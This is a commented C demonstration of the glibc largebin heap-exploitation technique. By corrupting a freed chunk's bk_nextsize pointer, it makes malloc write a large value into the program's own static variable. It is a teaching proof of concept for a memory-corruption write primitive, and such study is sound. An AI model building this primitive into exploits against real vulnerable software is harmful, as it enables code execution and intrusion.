#include <stdio.h>
#include <stdlib.h>
#include <inttypes.h>
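/* Target of the demonstration write.  Static storage gives it a stable,
 * printable address and a zero initial value; the program itself never
 * assigns to it, so any change is the allocator writing through the
 * corrupted pointer set up in step 2. */
static uint64_t victim;

/* malloc() wrapper for the demo.  The sequence below depends on every
 * allocation succeeding in order, so abort loudly instead of continuing
 * with NULL (which would turn the offset write in step 2 into a NULL+0x18
 * dereference). */
static void *must_malloc(size_t n)
{
    void *p = malloc(n);
    if (p == NULL) {
        fprintf(stderr, "malloc(%zu) failed\n", n);
        exit(EXIT_FAILURE);
    }
    return p;
}

/*
 * Walks through the three steps of the largebin-attack demo printed to
 * stdout: place one freed chunk in the largebin, a smaller one in the
 * unsortedbin, overwrite the largebin chunk's bk_nextsize field, then
 * request a size that matches neither chunk so the allocator's sorting
 * logic writes through the corrupted pointer into `victim`.
 *
 * Returns 0.  Exits with EXIT_FAILURE if an allocation fails.
 */
int main(void)
{
    /* Unbuffered stdio: output is not lost if the process crashes inside
     * malloc, and (presumably the main reason here) stdio does not
     * allocate its own buffer mid-demo and disturb the heap layout. */
    setbuf(stdout, NULL);
    setbuf(stderr, NULL);
    printf("You can use this technique to write a big number to arbitrary address\n");

    char *p1, *p2;

    /* Step 1.  p1 is the larger chunk, p2 the smaller.  The two 0x18
     * allocations sit between and after them; per the printed message they
     * exist so the freed chunks are not merged with their neighbours
     * (inferred from the layout, not stated explicitly). */
    printf("\n1. Create two chunk, and free the larger one into largebin list\n");
    p1 = must_malloc(0x458);
    must_malloc(0x18);
    p2 = must_malloc(0x448);
    must_malloc(0x18);
    free(p1);
    /* Trigger: a request larger than p1 (0x600 > 0x458) is what moves the
     * freed p1 out of the unsortedbin into the largebin, per the message
     * printed next.  The returned pointer is intentionally unused. */
    must_malloc(0x600);
    printf("Now the chunk %p is in largebin\n", (void *)p1);

    /* Step 2.  Free the smaller chunk, then overwrite what the demo
     * describes as p1's bk_nextsize field.  The 0x18 offset from the user
     * pointer and the -0x20 adjustment encode this demo's assumptions
     * about glibc's malloc_chunk layout; confirm them against the libc in
     * use.  The cast goes through uintptr_t so the pointer-to-integer
     * conversion is explicit. */
    printf("\n2. Free the smaller one into unsortedbin, and change chunk's bk_nextsize in largebin to &victim-0x20\n");
    free(p2);
    printf("Now the chunk %p is in unsortedbin\n", (void *)p2);
    *(uint64_t *)(p1 + 0x18) = (uint64_t)(uintptr_t)&victim - 0x20;

    /* Step 3.  0x68 matches neither freed chunk, so the allocator sorts
     * the unsortedbin chunk and, in doing so, writes through the pointer
     * planted above.  Whether the write actually lands depends on the
     * integrity checks present on this path in the glibc build being used
     * (the page does not say which version it was written against);
     * comparing the two printed values shows whether it did.  PRIx64 is
     * used because victim is uint64_t, which is not necessarily
     * unsigned long. */
    printf("\n3. Alloc a size not match the the chunk size in unsortedbin\n");
    printf("It will trigger largebin attack, write a big number to victim\n");
    printf("Before attack, victim's value: 0x%" PRIx64 "\n", victim);
    must_malloc(0x68);
    printf("After attack, victim's value: 0x%" PRIx64 "\n", victim);
    return 0;
}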